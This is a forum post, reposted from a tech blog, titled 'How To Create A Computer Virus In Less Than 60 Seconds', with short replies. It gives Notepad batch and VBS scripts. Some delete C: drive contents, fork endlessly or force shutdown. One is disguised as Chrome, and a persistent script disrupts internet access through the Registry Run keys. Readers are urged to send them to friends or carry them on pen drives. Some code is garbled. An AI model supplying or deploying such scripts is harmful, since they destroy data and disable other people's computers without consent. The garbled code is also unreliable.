Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,154,543 members, 7,823,380 topics. Date: Friday, 10 May 2024 at 09:21 AM

How To Create A Computer Virus In Less Than 60 Seconds - Computers - Nairaland

Nairaland Forum / Science/Technology / Computers / How To Create A Computer Virus In Less Than 60 Seconds (1299 Views)

What Really Is A Computer Virus Get An In Depth Knowledge / Computer Virus. / How To Create Computer Virus In Less Than 60 Seconds (2) (3) (4)

(1) (Reply)

How To Create A Computer Virus In Less Than 60 Seconds by sainttobs(m): 11:24am On Mar 16, 2018
Note: The methods listed in this article are merely for educational purposes. https://www.9jatechguru.com.ng is not to be held responsible for any actions you take using this turorial.

Learn how to create a computer virus in less than 60 seconds: Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. Today we are going to describe five ways to create a virus in less than a minute. Go through the post to know about it.

Today we are here with the method to Create a Virus in Less Than 60 seconds. Today every second, someone is using a computer and almost every one of them knows about a virus. A virus is a malicious program that enters into the computer without your permission and can affect your data and operating system. Well, viruses are of different types as there are trojan horses and much more. However, have you ever thought about creating a virus? You can create one within seconds, and it is possible with some simple methods that I am going to discuss in this post.

How To Create Computer Virus in Less Than 60 Seconds
Many of you will think the methods must be on coding, but there is nothing like that. The tricks are based on the notepad which is availableon every windows system. Just follow the below steps for creating a virus within a minute.


1. Creating a Dangerous Virus

Step 1. First of all, in your Windows OS, open the notepad.
Open-Notepad
Creating a Dangerous Virus
Step 2. Now copy and paste the below code in your notepad screen.
@Echo off
Del C: *.* |y

paste-the-code-1
Creating a Dangerous Virus
Step 3. Now save this file as virus.bat (you can select any of random name but .bat after that must be there).
saving-the-file

Creating a Dangerous Virus


Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.

Note: This method is only for knowledge purpose. Don’t try this on your computer as it will completely format your C drive.


Also Read: Most Common Android Problems And Their Solutions

2. Creating a Harmless Cdrom Virus
Open Notepad and Paste the following code into it and save it as CD-ROM.vbs or anything *.vbs


Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


cdrom
Creating a Harmless Cdrom Virus


When you double click on this file, you will be amazed at what this simple, harmless virus can do. Your CD/DVD drives will get continuously ejected.

To stop this virus, you need to open Task Manager and select process tab and end the wscript.exe file.

3. Create a Virus To Test Your Antivirus

Open notepad and paste the given code and simply save the file as “EICAR.COM”


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
EICAR

Create a Virus To Test Your Antivirus
If you have an active antivirus, then your antivirus program will simply remove this file in no-time. This is the harmless virus that is used to check the security level of your antivirus.


4. Virus To Stop Someone’s Internet Access

This is a harmless virus and it will not destroy your PC. You can use this trick to prank your friends. This virus stops anyone’s internet access. You need to type
the following code in the notepad.

@Echo off
Ipconfig /release[b/][i/]

Stop Someone’s Internet Access
Now Save the file as a .bat format like internet.bat and sent it to your friends. The IP address will be lost, and therefore they won’t be able to fix it.
Well, if you want to fix it. Simply type in IPconfig /renew

5. Creating a Matrix Type screen

Well, it’s not a virus. It is just a simple notepad trick that will let you see the string of green characters appearing randomly. It has nothing to do with your computer registry, batch, etc. You can use this trick to scare your friend because the screen looks like a virus affected.

Simply open Notepad and type the following code into it.

[i]
[b]@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


Matrix
Matrix Type screen
Now save the file as Matrix.bat, and click on it and the show begins.


6. Shutdown virus

You can also create a virus that can shut down computers. Well, this virus is harmless but can cause data loss due to sudden shutdown. Here’s how you can make a shutdown virus to pull up a prank with your friends.

Step 1. First of all, right click on your desktop and then choose the option “Create Shortcut”

Step 2. Now in the pop-up window type in -s -t 60 -c “Virus Detection. The computer is shutting down.” Instead of 60, you can put what value you want. It represents the time in seconds.

Step 3. Then click on the Next button and type chrome. Or whatever you want.

Step 4. Then you need to change the icon of the shortcut, choose the icon of Google Chrome.

Your virus will look like Google Chrome. You can carry this file in your Pendrive and can shut down your friends’ computer.

Few Other Notepad Virus Codes

Here are few other source codes to create a notepad virus on Windows computer. However, these viruses are dangerous and can destroy your computer. Therefore, don’t use this virus for evil purposes.

Note: The damages caused by these viruses are irreversible

#1 Disable Internet Permanently

The below code will disable anyone’s internet connectivity PERMANENTLY.
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE


#2 Endless Notepads

The below code will pop up endless notepads until the computer freezes and crashes!


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


#3 Endless Enter

The below code will make the enter button pressed continuously

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


So this is all about How To Create a Virus in Less Than 60 seconds. Using this method, you can easily create the harmful and harmless virus. If you have some more tricks like this, you can share with us. Hope you like the post! Don’t forget to share this cool post with your friends.

cc: lalasticlala

Source: https://www.9jatechguru.com.ng/2018/03/how-to-create-a-virus.html

1 Like 1 Share

Re: How To Create A Computer Virus In Less Than 60 Seconds by khalhokage(m): 5:50pm On Mar 16, 2018
Hehehehe, prank time.
Re: How To Create A Computer Virus In Less Than 60 Seconds by jacyhelen(f): 2:09pm On Mar 17, 2018
Wow....Thanks

(1) (Reply)

Top 10 Laptops In 2019 / Trillian - Use Multiple Chat Ids, Yahoo, Msn, Icq Simultaneously-unbelievable! / Multilinks Blue Broadband Router For Sale,

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 21
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.